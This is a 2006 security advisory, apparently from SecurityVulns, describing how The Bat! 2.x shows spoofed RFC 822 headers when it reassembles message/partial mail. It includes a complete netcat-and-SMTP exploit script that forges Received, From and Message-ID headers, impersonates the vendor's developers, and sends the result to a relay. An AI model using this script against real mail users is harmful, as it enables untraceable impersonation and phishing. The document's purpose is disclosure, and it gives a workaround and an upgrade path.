Информационная безопасность
[RU] switch to English





Title:            The Bat! 2.x message headers spoofing
Author:           3APA3A <[email protected]>
Vendor:           RitLabs
Vendor's page     http://thebat.net/
Application:      The Bat 2.x (2.12.04 tested)
Not vulnerable:   The Bat! 3.5
Remote:           Yes, against client
Category:         Information spoofing

Intro:

The   Bat!   is   very  convenient,  powerful and secure (comparing with
others)   MUA  (Mail  User  Agent)  with  many  professional  features:
templates,  macroses,  Bayesian  SPAM  filter,  etc.  This is commercial
product from RitLabs.

Vulnerability:

Design  flow  in  the  way The Bat! shows message/partial messages allow
attacker  to  spoof RFC 822 headers or original message, including _all_
Received:  and  Message-ID:.  It makes it possible to create untrackable
message and spoof message origin, including sender's network.

Details:

The  Bat!  silently  re-assembles partial message and shows encapsulated
data.  The  headers shown are ones of encapsulated message. Real headers
are lost completely.

Exploit:

Replace @example.com with destination address
nc ip_of_smtp_relay 25 <thebatexploit.txt


-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <[email protected]@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
        number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
        by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
        for <[email protected]>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <[email protected]>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <[email protected]@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
        number=2; total=2

Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=-  end thebatexploit.txt  -=-=-=-=-

Workaround:

Do not trust data The Bat! shows in headers.

Solution:

Upgrade to The Bat! 3.x (not free)


О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород